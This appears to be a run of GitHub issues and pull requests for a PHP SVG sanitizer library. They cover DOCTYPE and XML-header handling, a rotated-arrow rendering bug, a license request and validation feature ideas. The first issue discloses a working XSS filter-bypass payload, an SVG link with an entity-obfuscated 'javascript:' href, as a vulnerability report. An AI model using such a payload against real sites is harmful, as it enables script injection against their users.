Using payload below to bypass XSS filter:

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(document.domain)">
    <circle cx="0" cy="0" r="300"/>
  </a>
</svg>

Video POC: https://www.youtube.com/watch?v=MIAiX4gkp6U&feature=youtu.be

https://github.com/infinity-next/infinity-next/issues/121#issuecomment-143740026

http://www.w3.org/TR/SVG/types.html#DataTypeFuncIRI

Not sure how this could be fixed without castrating the SVG format.

Recent change disallowed CDATA sections, however the actual fix would have been to disallow non SVG-elements when used inline in some HTML-context.

Resolves: #70

INPUT

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 145 45">
  <metadata id="metadata"></metadata>
  <g id="whatever">
    <path id="path123"/>
  </g>
</svg>

OUTPUT

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 145 45">
  <metadata></metadata>
  <g>
    <path/>
  </g>
</svg>

So I have an SVG file created as "Export as" in Photoshop CC 2015. Running it through the sanitizer gives the following:

Is there anything I could do to catch this ?

Thanks a ton, Andrass

This change aims to address some shortcomings of the current remote reference checking method that allows //example.com/folder or ftp://… links to go through for example. I'm more confident using this sanitizer in my project with these changes.

Tried to follow the formatting of the file, but if something's off with that or the way this was done please let me know.

If you have an SVG files that begins with <?xml version="1.0" encoding="utf-8"?>, then Sanitizer will remove that when saving the clean XML elements back out to the XML file.

It happens in this line:

$clean = $this->xmlDocument->saveXML($this->xmlDocument->documentElement, LIBXML_NOEMPTYTAG);

The reason is that all of the XML header info (verison, encoding, etc.) is saved on $this->xmlDocument. Changing that line to:

$clean = $this->xmlDocument->saveXML($this->xmlDocument, LIBXML_NOEMPTYTAG);

Makes it behave as you'd expect. Just making sure that wasn't a conscious design decision before I submit a pull request.

When the attached file is uploaded via this plugin, the arrow on the vertical axis is rotated 90degrees - instead of pointing up it points to the right.

Original: scheduling.zip

Sanitized: scheduling-sanitized.zip

Wrong:

Correct:

If's hard to get any useful diff, as the plugin also changes all whitespace in the file...

Hi @darylldoyle!

I hope everything is great.

We would like to use your library, however we are working on a non-open source software. The current license (GPL v2) is blocking us from using the library.

Could you please consider changing the license to MIT or to Apache 2.0? Or perhaps having a double license like GPL v2 + MIT or GPL v2 + Apache 2 would be fine for you?

In that case more software developers will be able to use the library.

Hi,

not sure if I am doing anything wrong here. The sanitizer removes the DOCTYPE which breaks entities being used, e.g. in this adobe export file. After sanitizing this the file and opening directly in a browser, it produce errors like "Entity 'ns_extend' not defined".

before

<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 17.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [
	<!ENTITY ns_extend "http://ns.adobe.com/Extensibility/1.0/">
	<!ENTITY ns_ai "http://ns.adobe.com/AdobeIllustrator/10.0/">
	<!ENTITY ns_graphs "http://ns.adobe.com/Graphs/1.0/">
	<!ENTITY ns_vars "http://ns.adobe.com/Variables/1.0/">
	<!ENTITY ns_imrep "http://ns.adobe.com/ImageReplacement/1.0/">
	<!ENTITY ns_sfw "http://ns.adobe.com/SaveForWeb/1.0/">
	<!ENTITY ns_custom "http://ns.adobe.com/GenericCustomNamespace/1.0/">
	<!ENTITY ns_adobe_xpath "http://ns.adobe.com/XPath/1.0/">
]>
<svg version="1.1" id="Layer_1" xmlns:x="&ns_extend;" xmlns:i="&ns_ai;" xmlns:graph="&ns_graphs;"
	 xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="32px" height="32px"
	 viewBox="0 0 32 32" enable-background="new 0 0 32 32" xml:space="preserve">
...
</svg>

after

<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 17.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<svg version="1.1" id="Layer_1" xmlns:x="&ns_extend;" xmlns:i="&ns_ai;" xmlns:graph="&ns_graphs;"
	 xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="32px" height="32px"
	 viewBox="0 0 32 32" enable-background="new 0 0 32 32" xml:space="preserve">
...
</svg>

If there is a doctype then this is reported as an error

For example take any svg from thesvg 1.1 structural specification

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="8cm" height="3cm"
     xmlns="http://www.w3.org/2000/svg" version="1.1">
  <desc>Local URI references within ancestor's 'defs' element.</desc>
  <defs>
    <linearGradient id="Gradient01">
      <stop offset="20%" stop-color="#39F" />
      <stop offset="90%" stop-color="#F3F" />
    </linearGradient>
  </defs>
  <rect x="1cm" y="1cm" width="6cm" height="1cm" 
        fill="url(#Gradient01)"  />

  <!-- Show outline of canvas using 'rect' element -->
  <rect x=".01cm" y=".01cm" width="7.98cm" height="2.98cm"
        fill="none" stroke="blue" stroke-width=".02cm" />

</svg>

This produces the error

                {
                    "message": "Suspicious node 'svg'",
                    "line": -1
                }

Hello i wanna ask my application use php 5.6 when i'm try to install it no show error and when use it not show error also. there are possibility issue when use php 5.6? because i see support package "php": "^7.0 || ^8.0"

Thanks

Hello @darylldoyle thank you for this great library, it works really well.

I would like to use this library as a validation when uploading a SVG. In general it works ok, but there are some "feature requests" which probably could improve the handling. The use case it, that we want to decide if we allow the upload of the SCG or not not to clean up the uploaded SVG.

So we tried to sanitize and then check if there are any xmlIssues or if sanitize returns false. So far so good, but we stumbled here over some challenges:

• If there are PHP opening/closing tags, the sanitizer cleans them, but it's never reported somewhere
• If there is a comment in the SVG (which is ok I guess) it's reported as xmlIssue here
• There is no differentiation between the errors a comment raises the same issue level as a javascript
• It's hard to determinate what error occured just from having the strings (e.g. to output then custom error messages)

It would be nice to enhance the doc block comments with the description of the parameters and return values.

Is there anything which is on the roadmap for future releases?

Thank you in advance.